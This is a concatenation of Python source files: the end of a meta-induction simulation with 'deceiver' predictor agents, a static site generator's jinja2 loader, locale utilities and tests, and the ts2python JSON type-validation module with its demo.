best.successRate > self.miFav.successRate: self.miFav = best
if self.miFav == self: self.state = AG_FAIL
else: self.state = AG_SUCCEED
class Spy(Deceiver):  # keeping the name 'Spy'; it is the most common deceiver
"""The spy checks the favorites of all meta inductivists.
If it is a favorite of at least one of them it keeps failing,
otherwise the spy will play perfect."""
def __init__(self, name = "Spy"):
Deceiver.__init__(self, name)
def analyse(self):
for mi in self.world.miList:
if mi.fav == self:
self.state = AG_FAIL
break
else:
self.state = AG_SUCCEED
class InvMIDeceiver(Deceiver):
"""A type of deceiver that issues a collective conspiracy against
a defense of InvertedMIColls."""
def __init__(self, name = "InvMIDeceiver"):
Deceiver.__init__(self, name)
def analyse(self):
p = 0; n = 0
for mi in self.world.miList:
if isinstance(mi, InvertMIColl):
if mi.fav == self:
if mi.invert: n += 1
else: p += 1
if p > n: self.state = AG_FAIL
else: self.state = AG_SUCCEED
# These deceivers cheat the WeightedAvMIColls
class AvDeceiver(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.05:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver0(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver1(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.1:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver2(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.15:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver0Lim9(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0 or self.successRate > 0.9:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver0Lim8(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0 or self.successRate > 0.8:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver1Lim8(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.1 or self.successRate > 0.8:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver1Lim9(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.1 or self.successRate > 0.9:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AntiPunishDeceiver(Deceiver):
"""A deceiver that tries to escape the punishing by reducing
deception rate as soon as recorded as deceiver.
Berücksichtigt nicht den ultDeceiver-Status; ist bezogen auf
den neutralizing/punishing MI"""
def __init__(self, name = "AntiPunishDeceiver"):
Deceiver.__init__(self, name)
    # (local variant)
# def analyse(self):
# for mi in self.world.miList:
# if (mi.fav == self) and not mi.deceived(self):
# self.state = AG_FAIL
# break
# else:
# self.state = AG_SUCCEED
def analyse(self):
for mi in self.world.miList:
if self in self.world.favlist and \
not self in self.world.deceivers:
self.state = AG_FAIL
break
else:
self.state = AG_SUCCEED
"""Hinweis: führt dazu, dass Anti-Punisher schnell deception
status wechselt, bald als ultdeceiver eingestuft wird und dann
nur mehr richtig voraussagt. Passiert auch denn, wenn es mehr Anti-Punishers als
neutMIs gibt, weil jeweils ein anderer als Favorit dient und deceiver
wird"""
class AntiUltPunDeceiver(Deceiver):
"""Berücktichtig den ultDeceiver Status. Sobald ultimate deceiver,
wird er dennoch ge-punished. Es wird wieder globale Variante benutzt.
"Führt dazu, dass Anti-Punisher schnell deception
status wechselt, bald als ultdeceiver eingestuft wird und dann
nur mehr richtig voraussagt. Passiert auch denn, wenn es mehr Anti-Punishers als
neutMIs gibt, weil jeweils ein anderer als Favorit dient und deceiver
wird"""
def __init__(self, name = "AntiPunishDeceiver"):
Deceiver.__init__(self, name)
def analyse(self):
for mi in self.world.miList:
if self in self.world.favlist and \
not self in self.world.alldeceivers:
self.state = AG_FAIL
break
else:
self.state = AG_SUCCEED
class AntiDeceiver(Deceiver):
"""A potential deceiver that avoids being recognized as a deceiver after
some rounds by calculating his future status w.r.t. MI.
Der Algorithmus ist auch bei mehreren MIs sinnvoll,
weil globale deception-Parameter, bezogen auf beliebige MIs, benutzt
werden.
Es handelt sich um keinen eigentlichen deceiver; dennoch muss er von der
deceiver-class abgeleitet werden"""
def __init__(self, name = "AntiDeceiver"):
Deceiver.__init__(self, name)
def analyse(self):
if (self.world.round <= 10):
self.state = AG_SUCCEED
return
future_favlist = [m.fav for m in self.world.miList]
if self in future_favlist:
if not self.world.future_deceiveddown(self):
self.state = AG_FAIL
# print "favnodown"
return
else:
self.state = AG_SUCCEED
# print "favdown"
return
else:
if not self.world.future_deceivedup(self):
self.state = AG_SUCCEED
# print "nofavnoup"
return
else:
self.state = AG_FAIL
# print "nofavup"
return
########################################################################
#
# Tests
#
########################################################################
def Simulation(title, predictorList, rounds = 500, visibleRange=(-1,-1),
winTitle = "Indcution Simulation",
eventFunction = lambda : getRandomEvent(2.0/3.0)):
win = wxGfx.Window(size=(800,600), title=winTitle)
graph = Graph.Cartesian(win, 0, 0.0, rounds, 1.0,
title, "Round", "Relative Success")
world = World(eventFunction)
penBox = Graph.PenGenerator()
for predictor in predictorList:
world.register(predictor)
        pen = next(penBox)
pen.thickness = win.MEDIUM
graph.addPen(str(predictor), pen)
for n in range(1,rounds+1):
world.nextRound()
for predictor in world.getPredictorList():
graph.addValue(str(predictor), n, predictor.successRate)
        if n % (rounds // 10) == 0: win.refresh()
if visibleRange[1] >= 0:
graph.adjustRange(visibleRange[0], 0.0, visibleRange[1], 1.0)
win.waitUntilClosed()
def TestSuite():
Simulation("Test 7",
[
Spy("A"),
Spy("A"),
Spy("A"),
Spy("A"),
Spy("A"),
UltPunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
])
if __name__ == "__main__":
import Gfx, wxGfx, Graph
from wxPython.wx import *
TestSuite()
```
|
{
"source": "jecki/SchnelleSeite",
"score": 2
}
|
#### File: jecki/SchnelleSeite/jinja2_loader.py
```python
import os
import time
import jinja2
import markdown
import sitetree
##############################################################################
#
# jinja2 environment filters
#
##############################################################################
def jinja2_current_date():
"""Returns the current date as YYYY-MM-DD."""
return time.strftime('%Y-%m-%d')
@jinja2.pass_environment
def jinja2_translate(env, expression):
"""Translates expression within the given jinja2 environment.
This requires that the variables 'local', 'language' and 'root' are
defined in the jinja2 environment.
"""
return sitetree.translate(expression, env.globals)
@jinja2.pass_environment
def jinja2_targetpage(env, target):
"""Returns the page basename (without ".html") of a link target.
E.g. "authors.html#Shakespeare" yields "authors"
"""
return (target.split("#")[0]).split(".")[0]
@jinja2.pass_environment
def jinja2_linktarget(env, target):
"""Makes sure that target is a proper link target."""
parts = target.split("#")
if parts[0] and not parts[0].endswith(".html"):
parts[0] += ".html"
return "#".join(parts)
@jinja2.pass_environment
def jinja2_getcontent(env, datasource):
"""Returns the content of a data source."""
return sitetree.getentry(env.globals['local'], datasource,
env.globals['language'])['content']
@jinja2.pass_environment
def jinja2_getmetadata(env, datasource, key):
"""Returns a particular item from the metadata of an entry."""
return sitetree.getentry(env.globals['local'], datasource,
env.globals['language'])['metadata'][key]
@jinja2.pass_environment
def jinja2_getitem(env, datasource, key):
"""Returns a paritcular item from a data source that is a dictionary."""
return sitetree.getitem(key, env.globals['local'], datasource,
env.globals['language'])
@jinja2.pass_environment
def jinja2_fragments(env, directory, orderby=None):
"""Returns a list of pathnames pathnames (starting from directory) of all
fragments in a directory.
Parameters:
directory(string): The directory from which the fragments shall be taken.
orderby(string): A metadata parameter which determines the order of
the fragments. Instead of supplying a function for this
parameter it may also be set in the metadata of the template
or in the "__config" file of the fragments directory. The orderby
parameter in the template metadata (if present) overrides the same
parameter in the fragment's directories' "__config" file. The
            orderby argument passed to this function overrides both.
"""
folder = env.globals['local'][directory]
order = orderby or env.globals.get('orderby') or \
env.globals['local'][directory].get('orderby')
return sitetree.collect_fragments(folder, directory, order)
@jinja2.pass_environment
def jinja2_multicast_pagename(env, subpage):
"""Returns the basename of the output page on which a particular subpage
appears.
"""
return env.globals['MC_PAGENAMES'][subpage]
def other_lang_URL(folder, basename, lang):
"""Returns a relative link from the file 'basename' in 'folder' to the
the same file in the language version 'lang'.
"""
path = []
while folder.parent:
path.append(folder.metadata['foldername'])
folder = folder.parent
path.append(lang)
path.extend(['..'] * len(path))
path.reverse()
path.append(basename + ".html")
return "/".join(path)
@jinja2.pass_environment
def jinja2_other_lang_URL(env, lang):
"""Returns the URL to a different language version of the current page.
"""
return other_lang_URL(env.globals['local'], env.globals['basename'], lang)
@jinja2.pass_environment
def jinja2_markdownify(env, text):
"""Runs 'text' through a markdown processor and returns the resultant
html.
"""
return markdown.markdown(text)
@jinja2.pass_environment
def jinja2_filepath_basename(env, filepath):
"""Returns the base name, i.e. the filename w/o path and extension, of
    'filepath'. Note that the semantics of this filter differ from
    python's os.path.basename!
"""
return os.path.splitext(os.path.basename(filepath))[0]
@jinja2.pass_environment
def jinja2_filepath_ext(env, filename):
"""Returns the extension of filename.
"""
return os.path.splitext(filename)[1]
@jinja2.pass_environment
def jinja2_split(env, s, ch):
"""Splits string 's' with character 'ch' as delimiter into a list of parts.
"""
return s.split(ch)
@jinja2.pass_environment
def jinja2_lower(env, s):
"""Converts string `s` to lowercase letters.
"""
return s.lower()
@jinja2.pass_environment
def jinja2_upper(env, s):
"""Converts string `s` to lowercase letters.
"""
return s.upper()
##############################################################################
#
# jinja2 loader
#
##############################################################################
class CustomJinja2Loader(jinja2.FileSystemLoader):
"""A custom jinja2 loader that returns the page templates and reads
further templates from the disk if requested.
Attributes:
data(string): The page template
"""
def __init__(self, data, template_paths):
paths = ["./"]
if template_paths:
paths.extend(template_paths)
jinja2.FileSystemLoader.__init__(self, paths)
self.data = data
def get_source(self, environment, template):
if template:
return jinja2.FileSystemLoader.get_source(self, environment,
template)
else:
return (self.data, "", lambda: True)
def jinja2_loader(text, metadata):
"""A loader for jinja2 templates.
"""
templ_paths = ""
if "config" in metadata and "template_paths" in metadata["config"]:
templ_paths = metadata["config"]["template_paths"]
env = jinja2.Environment(loader=CustomJinja2Loader(text, templ_paths))
env.globals.update(metadata)
# TODO: catch errors because of use of reserved keywords
env.globals['current_date'] = jinja2_current_date
env.filters['CONTENT'] = jinja2_getcontent
env.filters['DATA'] = jinja2_getitem
env.filters['MD'] = jinja2_getmetadata
env.filters['FRAGMENTS'] = jinja2_fragments
env.filters['MC_PAGENAME'] = jinja2_multicast_pagename
env.filters['PAGE_URL'] = jinja2_other_lang_URL
env.filters['TR'] = jinja2_translate
env.filters['LINK_TARGET'] = jinja2_linktarget
env.filters['TARGET_PAGE'] = jinja2_targetpage
env.filters['MARKDOWNIFY'] = jinja2_markdownify
env.filters['SPLIT'] = jinja2_split
env.filters['LOWER'] = jinja2_lower
env.filters['UPPER'] = jinja2_upper
env.filters['basename'] = jinja2_filepath_basename
env.filters['ext'] = jinja2_filepath_ext
templ = env.get_template("")
try:
result = templ.render() # tmpl.render(metadata)
except jinja2.exceptions.TemplateNotFound:
# TEST CODE to be removed...
print(os.getcwd())
print(os.path.abspath(os.getcwd()))
assert False
return result
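# Hedged usage sketch (invented arguments; which metadata keys are required
# depends on the filters a template actually uses):
#     html = jinja2_loader("{{ fragment | MARKDOWNIFY }}",
#                          {'fragment': '*hello*'})
# should render to "<p><em>hello</em></p>", the text argument serving as the
# anonymous root template (see CustomJinja2Loader.get_source above).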
```
#### File: jecki/SchnelleSeite/locale_strings.py
```python
import os
fourletter = [
"aa_DJ", "aa_ER", "aa_ET", "ae_CH", "af_ZA", "ag_IN", "ai_IN", "ak_GH",
"ak_TW", "al_ET", "am_ET", "an_ES", "an_TW", "ap_AN", "ap_AW", "ap_CW",
"ar_AE", "ar_BH", "ar_DZ", "ar_EG", "ar_IN", "ar_IQ", "ar_JO", "ar_KW",
"ar_LB", "ar_LY", "ar_MA", "ar_OM", "ar_QA", "ar_SA", "ar_SD", "ar_SS",
"ar_SY", "ar_TN", "ar_YE", "as_IN", "at_IN", "az_AZ", "be_BY", "bg_BG",
"bn_BD", "bn_IN", "bo_CN", "bo_IN", "br_FR", "bs_BA", "ca_AD", "ca_ES",
"ca_FR", "ca_IT", "cs_CZ", "cv_RU", "cy_GB", "da_DK", "de_AT", "de_BE",
"de_CH", "de_DE", "de_LU", "ds_DE", "ds_NL", "dv_MV", "dz_BT", "el_CY",
"el_GR", "em_ZM", "en_AG", "en_AU", "en_BW", "en_CA", "en_DK", "en_GB",
"en_HK", "en_IE", "en_IN", "en_NG", "en_NZ", "en_PH", "en_SG", "en_US",
"en_ZA", "en_ZM", "en_ZW", "er_DZ", "er_MA", "es_AR", "es_BO", "es_CL",
"es_CO", "es_CR", "es_CU", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN",
"es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_PY", "es_SV", "es_US",
"es_UY", "es_VE", "et_EE", "eu_ES", "ez_ER", "ez_ET", "fa_IR", "ff_SN",
"fi_FI", "fo_FO", "fr_BE", "fr_CA", "fr_CH", "fr_FR", "fr_LU", "fy_DE",
"fy_NL", "ga_IE", "gd_GB", "gl_ES", "gu_IN", "gv_GB", "ha_NG", "he_IL",
"he_NP", "hi_IN", "hn_MX", "ho_IN", "hr_HR", "hr_RU", "hs_CA", "ht_HT",
"hu_HU", "hy_AM", "ia_FR", "id_ET", "id_ID", "ig_ER", "ig_NG", "ij_IT",
"ik_CA", "il_PH", "is_IS", "it_CH", "it_IT", "iu_CA", "iu_NU", "iu_NZ",
"iw_IL", "ja_JP", "ka_GE", "kk_KZ", "kl_GL", "km_KH", "kn_IN", "ko_KR",
"ks_IN", "ku_TR", "kw_GB", "ky_KG", "lb_LU", "lg_UG", "li_BE", "li_NL",
"lo_LA", "lt_LT", "lv_LV", "mg_MG", "mi_NZ", "mk_MK", "ml_IN", "mn_MN",
"mn_TW", "mr_IN", "ms_MY", "mt_MT", "my_MM", "nb_NO", "ne_IN", "ne_NP",
"ni_IN", "nl_AW", "nl_BE", "nl_NL", "nm_US", "nn_NO", "np_IN", "nr_ZA",
"oc_FR", "oi_IN", "ok_IN", "om_ET", "om_KE", "or_IN", "os_RU", "pa_IN",
"pa_PK", "pl_PL", "ps_AF", "pt_BR", "pt_PT", "rh_UA", "ro_RO", "ru_RU",
"ru_UA", "rw_RW", "rx_IN", "sa_IN", "sb_DE", "sb_PL", "sc_IT", "sd_IN",
"se_NO", "si_LK", "sk_SK", "sl_SI", "so_DJ", "so_ET", "so_KE", "so_SO",
"so_ZA", "sq_AL", "sq_MK", "sr_ME", "sr_RS", "ss_ZA", "st_ES", "st_ZA",
"sv_FI", "sv_SE", "sw_KE", "sw_TZ", "ta_IN", "ta_LK", "te_IN", "tg_TJ",
"th_TH", "ti_ER", "ti_ET", "tk_TM", "tl_PH", "tn_ZA", "tr_CY", "tr_TR",
"ts_ZA", "tt_RU", "ue_HK", "ug_CN", "uk_UA", "ur_IN", "ur_IT", "ur_PK",
"uz_PE", "uz_UZ", "ve_ZA", "vi_VN", "wa_BE", "wo_SN", "xh_ZA", "yc_PE",
"yi_US", "yn_ER", "yo_NG", "zh_CN", "zh_HK", "zh_SG", "zh_TW", "zl_PL",
"zu_ZA"
]
fourletter_set = set(fourletter)
twoletter = [
"AA", "AE", "AF", "AG", "AI", "AK", "AL", "AM", "AN", "AP", "AR", "AS",
"AT", "AZ", "BE", "BG", "BN", "BO", "BR", "BS", "CA", "CS", "CV", "CY",
"DA", "DE", "DS", "DV", "DZ", "EL", "EM", "EN", "ER", "ES", "ET", "EU",
"EZ", "FA", "FF", "FI", "FO", "FR", "FY", "GA", "GD", "GL", "GU", "GV",
"HA", "HE", "HI", "HN", "HO", "HR", "HS", "HT", "HU", "HY", "IA", "ID",
"IG", "IJ", "IK", "IL", "IS", "IT", "IU", "IW", "JA", "KA", "KK", "KL",
"KM", "KN", "KO", "KS", "KU", "KW", "KY", "LB", "LG", "LI", "LO", "LT",
"LV", "MG", "MI", "MK", "ML", "MN", "MR", "MS", "MT", "MY", "NB", "NE",
"NI", "NL", "NM", "NN", "NP", "NR", "OC", "OI", "OK", "OM", "OR", "OS",
"PA", "PL", "PS", "PT", "RH", "RO", "RU", "RW", "RX", "SA", "SB", "SC",
"SD", "SE", "SI", "SK", "SL", "SO", "SQ", "SR", "SS", "ST", "SV", "SW",
"TA", "TE", "TG", "TH", "TI", "TK", "TL", "TN", "TR", "TS", "TT", "UE",
"UG", "UK", "UR", "UZ", "VE", "VI", "WA", "WO", "XH", "YC", "YI", "YN",
"YO", "ZH", "ZL", "ZU"
]
twoletter_set = set(twoletter)
class LocaleError(Exception):
def __init__(self, locale_str):
Exception.__init__(self, "%s is not a valid locale" % locale_str)
def valid_locale(locale_str, raise_error=False):
"""Returns True if locale_str represents a valid locale. Otherwise,
returns False or raises an error depending on raise_error.
"""
if (locale_str in fourletter_set or locale_str in twoletter_set or
locale_str == 'ANY'):
return True
else:
if raise_error:
raise LocaleError(locale_str)
return False
def narrow_match(requested, available):
"""Finds the best match for the requested language in a set of available
languages.
Raises a KeyError if no match was found.
Raises a ValueError if no languages are available at all.
"""
assert requested == 'ANY' or len(requested) in [2, 5], \
str(requested) + " is not a valid language code!"
if not available:
raise ValueError("No variants available!")
if requested in available:
return requested
if 'ANY' in available:
return 'ANY'
if requested == 'ANY':
av_list = list(available)
av_list.sort()
return av_list[0]
if len(requested) > 2:
reduced_requested = requested[0:2].upper()
reduced_available = {av[0:2].upper(): av for av in available
if av != 'ANY'}
if reduced_requested in reduced_available:
return reduced_available[reduced_requested]
raise KeyError("No match for {0!s} in {1!s}".format(requested, available))
def match(requested, available, substitution_list):
"""Finds the best match for the requested language in a set of available
languages, but allows to pick a substitute if not match was found.
Raises a KeyError if not even an item from the substitution list is matches
(narrowly) the available languages.
"""
try:
return narrow_match(requested, available)
except KeyError:
for substitute in substitution_list:
try:
return narrow_match(substitute, available)
except KeyError:
pass
raise KeyError("No match found for {0!s} or any of {1!s} in {2!s}".format(
requested, substitution_list, available))
def get_locale(name):
"""Retrieve locale information from a file or directory name.
Parameters:
name(str): file or directory basename (i.e. without any extensions)
Returns:
locale information (string) or empty string if the name does not
contain any locale information
Raises:
LocaleError
"""
L = len(name)
if L > 4 and name[-4:].upper() == "_ANY":
return 'ANY'
if L > 6 and name[-6] == "_" and name[-3] == "_":
lc = name[-5:]
if lc in fourletter_set:
return lc
elif name[-5:-3].islower() and name[-2:].isupper():
raise LocaleError("%s in file %s" % (lc, name))
if L > 3 and name[-3] == "_":
lc = name[-2:]
if lc in twoletter_set:
return lc
elif lc.isalpha():
raise LocaleError("%s in file %s" % (lc, name))
return ''
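# Hedged examples of get_locale() (mirroring the rules stated above):
def _demo_get_locale():  # pragma: no cover
    assert get_locale("index_de_DE") == "de_DE"
    assert get_locale("index_DE") == "DE"
    assert get_locale("index_ANY") == "ANY"
    assert get_locale("index") == ""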
def extract_locale(filepath):
"""Extracts locale information from filename or parent directory.
Returns locale string or ''.
Locale information is assumed to reside at the end of the basename of the
file, right before the extension. It must either have the form "_xx_XX" or
"_XX", eg. "_de_DE" or simply "_DE", and represent a valid locale.
If no locale information is found in the file name the names of the parent
directory are checked inward out for locale information.
An error is reported, if there appears to be locale information
but if it is malformed.
An empty string is returned if no (intended) locale information seems to be
present in the filename or any of the parent directories' names.
"""
parent, path = os.path.split(filepath)
while path:
pos = path.rfind('.')
basename = path[:pos] if pos >= 0 else path
locale = get_locale(basename)
if locale:
return locale
parent, path = os.path.split(parent)
return ''
def remove_locale(name):
"""Returns file or directory name with locale information removed.
"""
assert name.find(os.path.sep) == -1
pos = name.rfind(".")
basename = name[:pos] if pos >= 0 else name
try:
locale = get_locale(basename)
if locale:
return (basename[:-len(locale) - 1] +
(name[pos:] if pos >= 0 else ""))
except LocaleError:
pass
return name
```
#### File: SchnelleSeite/tests/test_loader.py
```python
import io
import os
#import sys
import unittest
import loader
class TestLoader(unittest.TestCase):
def loadSnippet(self, snippet, injected_metadata={'basename': 'loadertest'}):
file_name = "testdata/loadertest.txt"
with open(file_name, "w") as f, \
io.StringIO(snippet) as g:
for line in g:
f.write(line.lstrip())
result = loader.load(file_name, injected_metadata=injected_metadata)
os.remove(file_name)
return result
def tearDown(self):
unittest.TestCase.tearDown(self)
if os.path.exists("testdata/loadertest.txt"):
os.remove("testdata/loadertest.txt")
def test_boundary_cases(self):
snp1 = "+++\na: 1\nlanguage: ANY\n+++\ninhalt\n"
res1 = {
'ANY': {'metadata': {'language': 'ANY', 'a': 1,
'basename': 'loadertest'},
'content': "inhalt\n"}}
# leading and trailing empty lines
self.assertEqual(
self.loadSnippet("\n \n\n" + snp1 + " \n \n\n")['loadertest'],
res1)
# additional empty lines
snp2 = snp1.replace("\n", "\n \n\n \n")
self.assertEqual(self.loadSnippet(snp2)['loadertest'], res1)
def test_zero_headers(self):
res = {'ANY': {'metadata': {'language': 'ANY',
'basename': 'loadertest'},
'content': "inhalt"}}
injected_metadata = {'language': 'ANY', 'basename': 'loadertest'}
self.assertEqual(self.loadSnippet("inhalt",
injected_metadata)['loadertest'],
res)
res['ANY']['content'] = "inhalt\n"
self.assertEqual(
self.loadSnippet("\ninhalt\n\n", injected_metadata)['loadertest'],
res)
def test_empty_header(self):
snp = "+++\nlanguage: DE\n+++\ninhalt"
res = {'DE': {'metadata': {'language': 'DE', 'basename': 'loadertest'},
'content': "inhalt"}}
self.assertEqual(self.loadSnippet(snp)['loadertest'], res)
def test_single_header(self):
snp1 = "+++\nlanguage: ANY\na: 1\n+++\nInhalt\n"
res1 = {
'ANY': {'metadata': {'language': 'ANY', 'a': 1,
'basename': 'loadertest'},
'content': "Inhalt\n"}}
self.assertEqual(self.loadSnippet(snp1)['loadertest'], res1)
# def test_multiple_headers(self):
# pass
def test_bad_headers(self):
for snp in ["+++", "\n+++\n", "a\n+++\nb: 1", "\n+++\n+++\n+++"]:
self.assertRaisesRegex(loader.MalformedFile,
loader.MalformedFile.END_MARKER_MISSING,
self.loadSnippet, snp)
def test_empty_files(self):
empty = {'en_US': {'metadata': {'language': 'en_US',
'basename': 'loadertest'},
'content': ""}}
self.assertEqual(
self.loadSnippet("", empty['en_US']['metadata'])['loadertest'],
empty)
self.assertEqual(
self.loadSnippet("+++\nlanguage: en_US\n+++\n")['loadertest'],
empty)
self.assertRaisesRegex(loader.MalformedFile,
loader.MalformedFile.LANGUAGE_INFO_MISSING,
self.loadSnippet, "+++\n+++\n+++\n+++\n")
def test_multiple_blocks_of_same_lang_exceptions(self):
snp = ("+++\nlanguage: DE\n+++\nInhalt DE\n"
"+++\nlanguage: EN\n+++\nInhalt EN\n"
"+++\nlanguage: DE\n+++\n2. Inhalt DE!!!\n")
self.assertRaisesRegex(
loader.MalformedFile,
loader.MalformedFile.MULTIPLE_BLOCKS_OF_SAME_LANGUAGE,
self.loadSnippet, snp)
def test_load_transtable(self):
transtable_csv = ("EN;DE\n"
"English;Englisch\n"
"German;Deutsch\n"
"\n\n")
transtable = loader.csv_loader(transtable_csv, {})
result = loader.load_transtable(transtable, {'item': 'test'})
self.assertEqual(result['EN']['metadata']['item'], 'test')
self.assertEqual(result['DE']['metadata']['item'], 'test')
self.assertEqual(result['DE']['content']['English'], "Englisch")
self.assertEqual(result['DE']['content']['German'], "Deutsch")
self.assertEqual(result['EN']['content']['English'], "English")
self.assertEqual(result['EN']['content']['German'], "German")
# if __name__ == "__main__":
# sys.path.append(
# os.path.split(os.path.dirname(os.path.abspath(sys.argv[0])))[0])
# import loader
# unittest.main()
```
#### File: SchnelleSeite/tests/test_locale_strings.py
```python
import os
import sys
import unittest
from locale_strings import *
# import locale_strings --> see below
class TestLocaleStrings(unittest.TestCase):
def test_narrow_match(self):
self.assertEqual(narrow_match('ANY', {'ANY'}), 'ANY')
def test_get_locale(self):
self.assertEqual(get_locale("name_ANY"), 'ANY')
self.assertEqual(get_locale("name_en_US"), 'en_US')
self.assertEqual(get_locale("name_DE"), 'DE')
self.assertEqual(get_locale("name"), '')
self.assertRaises(LocaleError, get_locale, "name_XY")
self.assertRaises(LocaleError, get_locale, "name_De")
self.assertRaises(LocaleError, get_locale, "name_ex_US")
self.assertRaises(LocaleError, get_locale, "name_EN_US")
# assume no mistake in the following case
self.assertEqual(get_locale("name_ABC"), '')
def test_remove_locale(self):
self.assertEqual(remove_locale("test_ANY.txt"), "test.txt")
self.assertEqual(remove_locale("test.txt"), "test.txt")
self.assertEqual(remove_locale("test"), "test")
self.assertEqual(remove_locale("test_en_US.txt"), "test.txt")
self.assertEqual(remove_locale("test_DE"), "test")
# don't remove locales if filename only consists of a locale
self.assertEqual(remove_locale("_EN.txt"), "_EN.txt")
# raise an error for false locales
# errors will only be raised on get_locale, but not on remove_locale, any more
# self.assertRaises(LocaleError, remove_locale, "test_US.txt")
def test_extract_locale(self):
self.assertEqual(extract_locale("alpha/beta_DE/gamma.txt"), "DE")
self.assertEqual(extract_locale("alpha_DE/beta_EN/gamma.txt"), "EN")
self.assertEqual(extract_locale("alpha/beta/gamma_DE.txt"), "DE")
self.assertEqual(extract_locale("alpha/beta/gamma.txt"), "")
self.assertEqual(extract_locale("alpha/beta_DE/gamma_ANY.txt"), "ANY")
# if __name__ == "__main__":
# sys.path.append(
# os.path.split(os.path.dirname(os.path.abspath(sys.argv[0])))[0])
# from locale_strings import *
# unittest.main()
```
|
{
"source": "jecki/ts2python",
"score": 3
}
|
#### File: ts2python/demo/README_example.py
```python
try:
from ts2python.json_validation import TypedDict, type_check
except ImportError:
# seems that this script has been called from the git
# repository without ts2python having been installed
import sys, os
sys.path.append(os.path.join('..', '..'))
from ts2python.json_validation import TypedDict, type_check
class Position(TypedDict, total=True):
line: int
character: int
class Range(TypedDict, total=True):
start: Position
end: Position
@type_check
def middle_line(rng: Range) -> Position:
line = (rng['start']['line'] + rng['end']['line']) // 2
character = 0
return Position(line=line, character=character)
rng = {'start': {'line': 1, 'character': 1},
'end': {'line': 8, 'character': 17}}
assert middle_line(rng) == {'line': 4, 'character': 0}
malformed_rng = {'start': 1, 'end': 8}
try:
middle_line(malformed_rng)
except TypeError as e:
print(e)
# expected:
# Parameter "rng" of function "middle_line" failed the type-check, because:
# Type error(s) in dictionary of type <class '__main__.Range'>:
# Field start: '1' is not of <class '__main__.Position'>, but of type <class 'int'>
# Field end: '8' is not of <class '__main__.Position'>, but of type <class 'int'>
```
#### File: ts2python/ts2python/json_validation.py
```python
from enum import Enum, IntEnum
import functools
import sys
from typing import Union, List, Tuple, Optional, Dict, Any, \
Generic, TypeVar, Iterable, Callable, get_type_hints
try:
from typing_extensions import GenericMeta, \
ClassVar, Final, Protocol, NoReturn
except ImportError:
from .typing_extensions import GenericMeta, \
ClassVar, Final, Protocol, NoReturn
# try:
# from typing import ForwardRef, _GenericAlias, _SpecialForm
# except ImportError:
# from typing import _ForwardRef # Python 3.6 compatibility
# ForwardRef = _ForwardRef
# _GenericAlias = GenericMeta
# _SpecialForm = Any
# try:
# from typing_extensions import get_origin
# except ImportError:
# def get_origin(typ):
# try:
# return typ.__origin__
# except AttributeError:
# return Generic
from .typeddict_shim import TypedDict, GenericTypedDict, _TypedDictMeta, get_origin
__all__ = ['validate_type', 'type_check', 'validate_uniform_sequence']
def strdata(data: Any) -> str:
datastr = str(data)
return datastr[:10] + '...' if len(datastr) > 10 else datastr
def validate_enum(val: Any, typ: Enum):
# if not any(member.value == val for member in typ.__members__.values()):
# raise ValueError(f"{val} is not contained in enum {typ}")
if not hasattr(typ, '__value_set__'):
typ.__value_set__ = {member.value for member in typ.__members__.values()}
if val not in typ.__value_set__:
raise ValueError(f"{val} is not contained in enum {typ}")
def validate_type(val: Any, typ):
"""Raises a TypeError if value `val` is not of type `typ`.
In particualr, `validate_type()` can be used to validate
dictionaries against TypedDict-types and, more general,
to validate JSON-data.
Examples::
>>> validate_type(1, int)
>>> validate_type(['alpha', 'beta', 'gamma'], List[str])
>>> class Position(TypedDict, total=True):
... line: int
... character: int
>>> import json
>>> json_data = json.loads('{"line": 1, "character": 1}')
>>> validate_type(json_data, Position)
>>> bad_json_data = json.loads('{"line": 1, "character": "A"}')
>>> try:
... validate_type(bad_json_data, Position)
... except TypeError as e:
... print(e)
Type error(s) in dictionary of type <class 'json_validation.Position'>:
Field character: 'A' is not a <class 'int'>, but a <class 'str'>
"""
if isinstance(typ, _TypedDictMeta):
if not isinstance(val, Dict):
